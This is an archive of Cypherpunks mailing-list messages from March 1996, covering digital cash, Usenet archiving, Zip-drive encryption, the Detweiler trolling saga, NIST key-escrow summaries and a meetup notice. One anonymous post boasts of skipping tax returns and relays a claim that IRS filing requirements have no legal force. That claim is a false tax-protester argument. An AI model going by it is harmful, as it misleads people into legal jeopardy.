From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeff@Molasar.BlackMagic.Com (Jeff Humphrey (KSC))
Date: Sat, 23 Mar 1996 17:10:59 +0800
To: ecash@digicash.com
Subject: e$'s (mini-rant)
Message-ID: <199603230546.AAA14968@Molasar.blackmagic.com>
MIME-Version: 1.0
Content-Type: text/plain



  <begin mini-rant>

                 The Internet Economy Must Be Grass Roots

                    (or, why can't we mint coins YET ?)


  Just a few thoughts.

  Being a small business, here are some of the things we THOUGHT we'd be
  able to do by now with anonymously transferable digital tokens (e$'s)
  that I'm amazed we still can't do.

  1) Issue tokens backed by services our site offers, or the services of
     our consultants, etc.

     Obviously, this isn't intended for general use (though we certainly
     wouldn't care if the currency was traded to organizations who would
     accept it for it's value)- it's intended to be traded with those
     people on the net that we do business with on a regular basis, rather
     like a ledger system, but slightly different (Even an online system
     that wasn't anonymous, a ledger, would be better than what's out
     there right now, which is NOTHING).

  2) Run our own mint- obviously, it's to our advantage to run the mint,
     we want to make sure it's secure, it's responsible for keeping value
     in OUR COINS, something of great importance to our reputation.

     Businesses want to issue all kinds of currencies- state currency is
     only ONE FORM of value.  We want to mint coins and distribute them
     freely in some cases, to advertise our services, to attract new
     customers, etc.  We want to mint "coupons" that have the same effect.
     We want to mint coins that are actually licenses for use of products
     that we want to distribute, licenses people can TRADE, licenses that
     hold their value past site-by-site use.  We want to be able to issue
     coins that we can optionally expire, optionally have anonimity, and
     optionally can or can't be transferred (some uses of these token
     systems are not served well by anonimity or by transferability). The
     possibilities are only endless if there is a transport, if there is
     a mechanism.  Not in theory, but in PRACTICE.

  When I played with the Magic Money software, my only thought was "YES!"
  but then it "went away" ?  It went away because it was difficult to
  use, which I'm sure would have been resolved (obviously, it would have
  needed extensions for network transport with email transport as an
  option but not a necessity).  It went away because the inventor of the
  original scheme holds the patents (which I have no problem with,
  obviously, but aren't there any competeing ideas ?  or does the inventor
  plan to "let" us mint our own currencies in the future ?).

  That this mechanism is being restricted to some "higher purpose" of a
  universal cash system, beginning (and ending I suspect) with backing
  by state currency makes me down right mad.  There are a million and
  one uses for this mechanism that nobody has even THOUGHT OF yet, and
  there are plenty that people HAVE thought of- but the mechanism isn't
  available to the public, it's being used instead in a very narrow way.
  And in my Not So humble opinion, the way to Internet Economy isn't
  from the top anyway, it's from the people who provide the value in the
  first place, it's from the businesses who desperately want to get 
  moving but feel their hands are tied.

  I have communicated with every author of "e$" type systems that I know
  of, and they all had very big plans for their systems, were all looking
  for sponsorship and talking to banks, and everyone of them completely
  FAILED to even ANSWER email from me when I asked when we could use
  their mechanisms for minting our own currencies and running our own
  mints on the Internet (I take that back, one of them answered, they
  just said, in a word, "no").  And I find that ANNOYING, mostly because
  it's just putting things off-- years now and we're not much closer to
  "Internet Economy" than we were when we started.

  It's gotta be grass roots, it's gotta be free (or cheap), and most
  importantly, it's gotta be SOON.

  History has show in endless repetition, that the only standards on the
  Internet are free standards.  The Web would have never taken off if
  both the thing that "lets the user access the system" (the client) and
  the thing that "allows distribution of content" (the server) hadn't
  been available freely-- and the mint software in any of the proposed
  token systems are just that, content distributing servers.  Every single
  person on this planet is a business.  All good things start with the
  individuals (especially on the net, as we've seen OVER and OVER).

  The world is full of things that were "good", but were too propietary,
  they fill the backrooms of many a code shop.  In the words of a very
  common-sensical post I saw just a few days ago,

   "... because of a Betamax attitude, I'll follow the market to VHS."

  The only thing lacking right now is a VHS to follow, but beware, the
  need is so high, there will be one ...

  In short, give us the mechanism!  Once it's available, sit back and
  watch the net soar ... just like it always does ...

  The most recent application of this type of mechanism that I saw, or at
  least it could have been an application for it if there WAS a mechanism,
  was a group of organizations that wanted to trade certain types of
  information among themselves-- they wanted it to be based on merit, that
  is, those individuals/organizations who PROVIDE data also GET data from
  the system.  It was a perfectly contained closed economy that desperately
  needed a token system as it's heart, but alas, there wasn't one.

  Trying to remain patient.

  <end mini-rant>

  Woowoo!  Spring is here! :)

  Jeff.


-- 
Simply Be.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 23 Mar 1996 17:29:17 +0800
To: cypherpunks@toad.com
Subject: Re: Excluding articles from DejaNews
Message-ID: <ad78effb01021004d8f4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:48 AM 3/23/96, Rich Graves wrote:

>AltaVista doesn't index web sites that follow the Robots Exclusion
>Standard. Does that mean you won't use AltaVista anymore, either?

I didn't say that an indexing policy is the determinant of my using it or
not, only that DejaNews looks less attractive than it did before (which
wasn't very attractive anyway, compared to AV...your mileage may vary, so I
won't be engaging in Search Engine Wars).

>Agreed, anyone really concerned about their privacy should be using
>anonymity/pseudonymity, but a temporary hidey-hole is a Good Thing.

Well, I mostly disagree with this point. It gives the poster the
_comforting illusion_ of privacy, when in fact the Real Threat (tm) is that
the search engines of 2-5 years from now will trivially uncover all of the
"asides" (to use Rich's term) made in rec.music.white-power and
alt.sex.cypherpunks. It is the searches done several years from now that
will no doubt be of greatest concern to job seekers, professors seeking
tenure, and candidates for political office. No matter the "no archive"
headers, somebody will archive it. Thus, spiders will find it.

This is the "ostrich effect" I was referring to. The illusion of security.

>But I can think of a lot of reasons you might want to post something
>under your real name, or your regular pseudonym -- gaining the benefit of
>your good (or bad) reputation, mostly -- but on the other hand, you don't
>want that post archived. It's called an "aside."

The point is that just because one or more sites is not archiving the
traffic does not mean that other sites are not. Look at the parallels to
cancellation: some sites strongly believe that "cancellation" is a bogus
concept, that once a message has gone out it is part of the overall feed.
(I concur with this view, and, if I ran a site, would not honor so-called
"cancellations.")


>For example, I might want to say, "Tim May is a big fat idiot because of
>what he just said." I do want to say that, publicly, under my name and

It created a best-seller for Al Franken.....

>address, but for various reasons, I don't want that saved in the
>archives. Since X-Headers are readable by most newsreaders, and are in

Well, what you _want_ and what you're gonna git are not necessarily the
same thing. I expect some sites are going to advertise that they archive
and/or index _all_ public traffic, becoming a "site of record."

>OK, you've convinced me that this isn't a privacy thing, really, but I
>think is a valid and useful thing. What's the alternative, really? If I

At the risk of repeating myself:

-- some people will want to request "no archives" (for "asides" and "off
the record" comments.

-- some sites will honor these requests.

-- other sites will not.

-- that at least one site keeps the traffic and makes indices available is
sufficient to negate the effect of requesting "no archives."

-- the practical effect will be initially to make a search for the "no
archive" words _slightly_  more difficult, but not practically so...in
spiderspace, the distances are compressed and a search will still turn up
the words.

>want to say something, now, are you going to tell me that I don't have
>the right to request that you not take my comments on the record? That
>sounds sort of totalitarian. I either have to create a new, unique nym on

"Totalitarian"? You spoke publically, in this example, and I remembered
your words. What is totalitarian about this? Trying to purge uttered words
is the hard thing to do, actually.

>the fly, in which case my comments lose anything associated with my name,
>or I have to keep my comments to myself. Recognizing "Well, the full
>context is recorded too, you can defend youself with that" only makes it
>worse, really.
>
>Just thinking out loud, my thoughs being recorded for posterity on
>hks.net and Exon-knows where else...

Indeed, the storage densities and net connections that are coming will make
your words here trivially searchable by your daughter in her third-grade
class in 2005. Maybe on her handheld terminal.

(And she'll probably be most interested in the words that Daddy thought to
label as "no archives," as you yourself presaged in an earlier message.
Those are likely to be the juicier things to read.)

--Tim May

THE X-ON CONGRESS:  INDECENT COMMENT ON AN INDECENT SUBJECT, by Steve
Russell, American Reporter Correspondent....You motherfuckers in Congress
have dropped over the edge of the earth this time... "the sorriest bunch
of cocksuckers ever to sell out the First Amendment" or suggesting that
"the only reason to run for Congress these days is to suck the lobbyists'
dicks and fuck the people who sent you there," ....any more than I care
for the language you shitheads have forced me to use in this
essay...Let's talk about this fucking indecent language bullshit.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 23 Mar 1996 18:55:39 +0800
To: "Deranged Mutant" <erc@dal1820.computek.net>
Subject: Re: protection on IoMega ZIP drives
Message-ID: <2.2.32.19960323104511.0091c3e4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:08 AM 3/23/96 +0000, Deranged Mutant wrote:
>On 23 Mar 96 at 3:00, Ed Carp wrote:
>
>> Has anyone tried SFS?  It should work on the zip drive, though I've not 
>> tried it (yet)...
>
>If I recall some recent threads on alt.security.pgp (or sci.crypt?), 
>SFS doesn't work on ZIP drives (since ZIPs use the parallel port...).
>
>[Or do ZIPs use Scuzzies and the people who had problems were just 
>too lame to figure out that they had to load the driver before SFS?]

There are two versions of the Zip drive.  One is SCSI and one is Parallel
faking scsi.

The big problem is with the zip drivers.  There is some sort of
incompatibility between SFS and the zip drivers.  (I hacked on it for a
couple of hours with no luck.)  Win95 makes the problem worse, as it is
difficult to judge just when the driver for the zip drive loads.  (I have a
number of complaints about the zip drive drivers.  Lack of documentation is
one of them...)

Sometime I will have to fire up SoftICE and see exactly what the conflict is...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 23 Mar 1996 22:58:27 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: protection on IoMega ZIP drives
In-Reply-To: <31533A8F.3A9E@unix.asb.com>
Message-ID: <Pine.3.89.9603230312.B7462-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Mar 1996, Mutant Rob wrote:

> For the PC you might be able to hack SecureDrive to handle SyQuest
> and ZIP drives.  I recall R.Brown's interrupt lists showed that the
> drivers set up different subfunctions for Int 13h (low-level disk ops).

Has anyone tried SFS?  It should work on the zip drive, though I've not 
tried it (yet)...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 23 Mar 1996 19:29:34 +0800
To: cypherpunks@toad.com
Subject: Re: detweiling
In-Reply-To: <199603230713.IAA16986@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.960323030718.1084A-100000@elaine30.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Mar 1996, Anonymous wrote:

> imho the lesson of detweiler has nothing to do with
> detweiler, but in fact more to do with his
> targets. effective "detweiling" would be impossible if it
> were not for the large egos of his quarry. he

This is true. Without realizing it (until I took a look a the alleged
Detweiler web pages), I've been Detweiling on a number of Neo-Nazi lists
for a while. This type of psychological warfare is pretty interesting.

> detweiler took a lot of pride in how much reaction
> he could get with just a few posts or barbs. he is not
> really apparently responsible for ever actually
> mailbombing the cpunk list from what I can tell.
> he believed he was perfecting the art of playing
> with people's egos. a sort of depraved cyberspatial
> psychology experiment.

It's not an art. It's just being an asshole, and there's nothing new 
about it. the alleged Detweiler had a few interesting observations, but 
most of them were cypherpunk-specific.

I do see a real tension between the norms of anonymity and full
disclosure, though, which I'll have to think about a bit more before
committing it to Tim May's eternal data haven with my name atached. 

> the amusing thing about "detweiling" is the way
> that it is something like a bad, self-perpetuating
> virus among those with big egos.

I should have a good example of this on the Stormfront list shortly.

> there is nothing new about detweiler's approach.
> there was a classic greek who was put to death
> for the same reason: not provoking people by calling
> them names, so much as asking them questions that
> embarrassly exposed all their ego problems.
> his name was called "socrates" and he was put to
> death for refining his art beyond that which was
> tolerated by a power structure largely populated
> by those with the ego problems (power structures
> are always dominated by these types, it is like
> flies and dead meat, or moths and flames).

I'm not so sure. I'd say that these types are more concentrated in
political activism (where I would place many political cypherpunks) nad
in mid-level politics and bureaucracies, not in high-level power
structures. The people who come to power, and stay in power, have learned
to transcend ego and paranoia. Nixon, who had been very good at this,
lost it. Clinton seems to be holding up quite well. (This is not to say
anything about their politics or characters, just their temperaments.)

> the joke of course may be that detweiler could have
> been dead for a long time, and people here would
> still be blaming him for their problems.

Read Milan Kundera's _The Joke_ for an interesting twist on this. Or 
maybe _Rosencrantz and Guildenstern are Dead_.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Sat, 23 Mar 1996 19:12:03 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: protection on IoMega ZIP drives
In-Reply-To: <199603231021.FAA24721@unix.asb.com>
Message-ID: <Pine.3.89.9603230444.A22602-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Mar 1996, Deranged Mutant wrote:

> On 23 Mar 96 at 3:00, Ed Carp wrote:
> 
> > Has anyone tried SFS?  It should work on the zip drive, though I've not 
> > tried it (yet)...
> 
> If I recall some recent threads on alt.security.pgp (or sci.crypt?), 
> SFS doesn't work on ZIP drives (since ZIPs use the parallel port...).
> 
> [Or do ZIPs use Scuzzies and the people who had problems were just 
> too lame to figure out that they had to load the driver before SFS?]

Perhaps the latter, but Zip drives come in two flavors: parallel and 
SCSI.  I have the SCSI version :)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 23 Mar 1996 18:18:22 +0800
To: Ed Carp <erc@dal1820.computek.net>
Subject: Re: protection on IoMega ZIP drives
Message-ID: <199603231021.FAA24721@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 23 Mar 96 at 3:00, Ed Carp wrote:

> Has anyone tried SFS?  It should work on the zip drive, though I've not 
> tried it (yet)...

If I recall some recent threads on alt.security.pgp (or sci.crypt?), 
SFS doesn't work on ZIP drives (since ZIPs use the parallel port...).

[Or do ZIPs use Scuzzies and the people who had problems were just 
too lame to figure out that they had to load the driver before SFS?]


Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sat, 23 Mar 1996 18:35:59 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: http://anarchy-online.dementia.org/book/
In-Reply-To: <Pine.SUN.3.91.960322210713.13941F-100000@eff.org>
Message-ID: <3153D109.5CB6@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


[..]
>          A New Book Investigating Sex on the Internet
>         is Pre-Published, Free, via the World Wide Web[..]
>                            ...It includes transcripts from
> pornographic IRC chat sessions and sexually oriented Usenet
> news groups...

Interesting. An investigative report that could technically be banned 
under the CDA, simply by including "illegal" material.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 23 Mar 1996 15:21:54 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199603230455.FAA13248@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


So what? I've gone years without filing a damned tax return because I don't owe anything. And the couple of times I realized they owed me something I filed tax returns a year or two late.
They don't give a shit unless they think you owe them money
(or technically, if you actually do even if they don't know it).

CP-Lite warning: no crypto.
CDA Warning: Fuck you too.

gjeffers@ns.htc.net (Gary Lee Jeffers) scritten:

>From STRATEGIC INVESTMENT March 20, 1996
 ...

>                        Is the IRS a paper tiger?
 ...

>   As the IRS teeters on the brink, a fellow named Eddie Kahn has stepped
>forward and may be about to push the whole creaking mess over the edge.
>He hasn't got an arrow in his back yet, so he might just succeed. Dis-
>dainful of "tax protests" such as 5th Amendment or legal tender arguments
>that quickly get their advocates behind bars, Eddie looked into the stru-
>ture of federal law. When Congress passes a law, codified as a statute,
>it then delegates to a regulatory agency the authority to issue the im-
>plementing regulations specifiying to whom and under what circumstances
>the statute applies. These regulations must, by law, be published in the
>Federal Register. Lacking these implementing regulations, the law cannot
>be applied and has no force. Well, it turns out that the implementing re-
>gulations for IRS' enforcement statutes-things like the requirement to
>file a tax return and the authority to place a lien-cannot be found in
>the Federal Register. When queried on this, the General Counsel for the
>Office of the Federal Register, Michael White, replied in writing, "Our
>records indicate that the Internal Revenue Service has not incorporated
>by reference in the Federal Register a requirement to make an income tax
>return."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 23 Mar 1996 16:47:32 +0800
To: cypherpunks@toad.com
Subject: Re: IPG - newest release of the ABC Encryption Algorithms (fwd)
In-Reply-To: <314F0DB1.61FE@tivoli.com>
Message-ID: <199603230638.HAA16135@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Chris McAuliffe (cmca@alpha.c2.org) wrote:

: >One tangerine-flavord Starburst to the first cypherpunk who can give
: >a rough estimate for the results of the sub-expression:
: >	(random() & 0xff) & 0x3500
: 
: Well, actually, it depends on whether the bytes are treated as signed or
: unsigned, and we don't know for sure that IPG wanted them treated as
: unsigned. This means IPG either:
: 
: a) can't write portable code, or
: b) really are as stupid as we are giving them credit for.

a) is obvious, since they explicitly say that they coded it in 80x86 
assembler, but I wouldn't discount the possibility of b) being true also.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 23 Mar 1996 17:07:14 +0800
To: cypherpunks@toad.com
Subject: detweiling
Message-ID: <199603230713.IAA16986@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I've been studying "detweiling" in old archives
as this issue is raised here every so often.

imho the lesson of detweiler has nothing to do with
detweiler, but in fact more to do with his
targets. effective "detweiling" would be impossible if it
were not for the large egos of his quarry. he
selects his targets carefully based on the size
of their egos, presses their obvious
buttons, and stands back to watch
the fireworks ensue. the larger the ego, the
more easy it is to do this. (i.e. larger
fireworks/provocation ratio).

detweiler took a lot of pride in how much reaction
he could get with just a few posts or barbs. he is not
really apparently responsible for ever actually
mailbombing the cpunk list from what I can tell.
he believed he was perfecting the art of playing
with people's egos. a sort of depraved cyberspatial
psychology experiment.

the amusing thing about "detweiling" is the way
that it is something like a bad, self-perpetuating
virus among those with big egos. detweiler took
great glee in starting the virus wherein these 
people with big egos blame all their obvious 
personal problems on him (i.e. atrocious lack of 
interpersonal skills). since the virus propagates
not because of any action on his part, but because
of the inherent psychology of those with big 
egos, it continues on this list even though 
there seems to be no evidence that Detweiler
has had anything to do with this list for
perhaps over a year.

the cypherpunks is a rabid breeding ground for
this detweiler virus, because of the vast array
of throbbing egos. the flamewars are routine
because of the immature psychology of many posters,
esp. the more "prominent" ones. even anonymous
or pseudonymous posters defend themselves because
of their large egos, and those with big egos feel
they have to defend themselves against anonymous
or pseudonymous accusations, or take intermittent
jabs at whatever hapless pseudonym-of-the-week 
is thought to be detweiler.

imho from what I have seen (which is admittedly
not everything, as the detweiler stuff is rather
endless), detweiler is not really destructive in himself.
but he is an amazing catalyst to those that already
have destructive tendencies within themselves,
and he tweaks them into erupting. in a sense it
is almost a public service in helping people with
big egos temporarily relieve their "painful
flareups".

but I see no sign that he has been anywhere near
the list for a long, long time, and I think all
the ranting and scapegoating of him is quite
strong evidence of all the big egos and small minds
that litter this list.

there is nothing new about detweiler's approach.
there was a classic greek who was put to death
for the same reason: not provoking people by calling
them names, so much as asking them questions that
embarrassly exposed all their ego problems.
his name was called "socrates" and he was put to
death for refining his art beyond that which was
tolerated by a power structure largely populated
by those with the ego problems (power structures
are always dominated by these types, it is like
flies and dead meat, or moths and flames).

the joke of course may be that detweiler could have
been dead for a long time, and people here would
still be blaming him for their problems. perhaps
we have a new convenient substitute for Satan in
the cyberspace age. "the detweiling made me do it."
(hee, hee). "projection" was identified by freud
in another century as a basic device of the ego,
a pity that few in our modern era are aware-- or
perhaps it is not such a pity from detweiler's
perspective. <g>

(p.s. I imagine quite a few people will accuse "me" of
being detweiler. I assure you my amusement will at least
exceed or match that which detweiler ever obtained.)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Farrell <pfarrell@netcom.com>
Date: Sat, 23 Mar 1996 22:11:04 +0800
To: cypherpunks@toad.com
Subject: Martin Marietta Energy Systems' summary of December GAK meeting
Message-ID: <199603231353.FAA21838@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to John Young, who scanned the snailmail document sent out by NIS&T,
I have made the available on my NIST meeting web the document that NIS&T says
is:
"The enclosed document is an unofficial summary of the December 5, 1995
meeting held at the National Institute of Standards and Technology to
discuss the 64-bit software key escrow encryption exportability initiative."

URL is http://www.isse.gmu.edu/~pfarrell/nist/dec5sum.html

Nothing really new here, the author recorded essentially what I wrote up
and posted back in December. But this author has a different viewpoint.

Pat
Pat Farrell        Grad Student         http://www.isse.gmu.edu/~pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 23 Mar 1996 23:32:51 +0800
To: cypherpunks@toad.com
Subject: Cancel-proof archives (Was: Excluding articles from DejaNews)
In-Reply-To: <ad78effb01021004d8f4@[205.199.118.202]>
Message-ID: <Vgy9kD19w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@got.net (Timothy C. May) writes:
...
> The point is that just because one or more sites is not archiving the
> traffic does not mean that other sites are not. Look at the parallels to
> cancellation: some sites strongly believe that "cancellation" is a bogus
> concept, that once a message has gone out it is part of the overall feed.
> (I concur with this view, and, if I ran a site, would not honor so-called
> "cancellations.")
...

Dave Hayes's definition of a "Site of Virtue" includes not honoring cancels and
rmgroups and certain other things. Check out Dave's site: jetcafe.org.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 23 Mar 1996 22:35:07 +0800
To: cypherpunks@toad.com
Subject: Martin Marietta Energy Systems' summary of December GAK meeting
Message-ID: <199603231422.JAA12441@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by pfarrell@netcom.com (Pat Farrell) on Sat, 
23 Mar  8:57 AM


>Nothing really new here, the author recorded 
>essentially what I wrote up  and posted back in 
>December. But this author has a different viewpoint.


Pat's report was much better, and it's worth wondering why NIST 
bothered to send out this "unofficial" summary rather than one 
of its own professional reports. Perhaps to flash the name of a 
big corporation as evidence of industry input, perhaps to 
induce paranoia that something else is going on beneath the 
camouflage and shrewd business better get on board.


I'm nasty enough to think that NIST hopes this throwaway will 
sedate their opponents.


Recall that the Administration has not really responded to 
authentic, open, industry criticism. And seems to be 
stonewalling in public while making mutually beneficial 
arrangements favored insiders -- like Martin Marietta, eager to 
claim, with relief, that nothing of importance happened at the 
meeting to upset covert deals?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 24 Mar 1996 00:22:57 +0800
To: cypherpunks@toad.com
Subject: Re: detweiling
Message-ID: <v02120d0aad79c1c4b7ce@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:18 AM 3/23/96, Rich Graves wrote:
> On Sat, 23 Mar 1996, Anonymous wrote:
>>  <Detweiler stuff.>
> <Rich's response to Detweiler stuff>

Uh, Rich?...

You've probably been detweiled by Detweiler himself.

Someone around here has a concordance program, called MEDUSA, if I remember
right, which can spot Detweiler pretty well by statistical analysis of the
words he uses.

My hunch is that this particular "anonymous" is LD himself. I take my hint
from this line:

> the joke of course may be that detweiler could have
> been dead for a long time, and people here would
> still be blaming him for their problems. perhaps
> we have a new convenient substitute for Satan in
> the cyberspace age. "the detweiling made me do it."
> (hee, hee). "projection" was identified by freud
  ^^^^^^^^^^^

> in another century as a basic device of the ego,
> a pity that few in our modern era are aware-- or
> perhaps it is not such a pity from detweiler's
> perspective. <g>
>
> (p.s. I imagine quite a few people will accuse "me" of
> being detweiler. I assure you my amusement will at least
> exceed or match that which detweiler ever obtained.)


... Which could have been put there on purpose. You Never Know... ;-).

All this and the fact that he now wants to convert his name into a verb.

Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Jemmett <jemmett@goodnet.com>
Date: Sun, 24 Mar 1996 01:33:57 +0800
To: cypherpunks@toad.com
Subject: remove
Message-ID: <199603231715.KAA15099@goodguy.goodnet.com>
MIME-Version: 1.0
Content-Type: text/plain


remove NOW
Thanks

GoodNet, LLC
David Jemmett
602-303-9500 ext. 224





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 24 Mar 1996 02:14:29 +0800
To: cypherpunks@toad.com
Subject: "Look to the skies!"
Message-ID: <ad797aa4030210046c85@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I urge any of you haven't to look at Comet Hyakutake tonight or in the next
few days.

While this has nothing to do with "crypto," it is a sufficiently impressive
sight that I urge you to check it out. If you have children, all the more
reason to. It could spark an interest in science in some young child
otherwise preoccupied with memorizing the words (all 7 of them) to
"Gangsta's Paradise."

Newspapers are carrying sky charts, and the Web has numerous charts (one
I've been using is
http://wkuweb1.wku.edu/Dept/Academic/Ogden/Phyast/k5_.htm).

By around midnight last night it was overhead, near Arcturis and almost in
a straight line with the Big Dipper's handle. (The comet is moving
generally from Bootes toward Polaris, the North Star, so it will be visible
most of the night, rotating around Polaris as the constellations rotate--as
the Earth rotates, of course.) Don't rely on this description to try to
find it--consult a star chart specifically intended for finding the comet.

The moon is setting early, with the sun, so skies are optimum for seeing
it. A dark location is of course best. City lights will make the tail hard
or impossible to see, though the comet core itself is a bright object and
should be visible anywhere even a handful of stars are visible (but you may
not realize you're looking at a comet unless you can see the tail).

Binoculars are great (I'm using 7 x 50 and 14 x 70), but the comet and its
tail is a naked-eye subject in dark skies. I found the tail to extend
several fist-widths at arm's length. The tail was visible with the naked
eye.

Pretty impressive.

Tim says: "Check it out!"


--Tim


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Claborne <Chris.Claborne@SanDiegoCA.ncr.com>
Date: Sun, 24 Mar 1996 04:38:09 +0800
To: cypherpunks@toad.com
Subject: San Diego Cypherpunks Physical Meeting
Message-ID: <2.2.32.19960323202431.0038d320@opus.SanDiegoCA.ATTGIS.com>
MIME-Version: 1.0
Content-Type: text/plain


San Diego Area CPUNKS symposium  Thursday, March 28, 1996

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's
anonymous e-mail server, "mixmaster", exchange keys, and discuss other
topical CP stuff.  There's always the semi-topical discussions; Internet
Service Provider in San Diego (providing, anonymous remailers and other
privacy services), stelth communications, latest Cypherpunk goings-on,
Internet happenings.

   Don't forget to bring your public key  fingerprint.  If you can figure
out how to get it on the back of a business card, that would be cool.  

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend.


     2
 -- C  --

                                        ...  __o
                                       ..   -\<,
Chris.Claborne@SanDiegoCA.ATTGIS.Com   ...(*)/(*).          CI$: 76340.2422
http://bordeaux.sandiegoca.attgis.com/
PGP Pub Key fingerprint =  A8 FA 55 92 23 20 72 69  52 AB 64 CC C7 D9 4F CA
Avail on Pub Key server.
Dreams.  They're just screen savers for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 24 Mar 1996 04:53:40 +0800
To: Ted Garrett <wlkngowl@unix.asb.com (Mutatis Mutantdis)
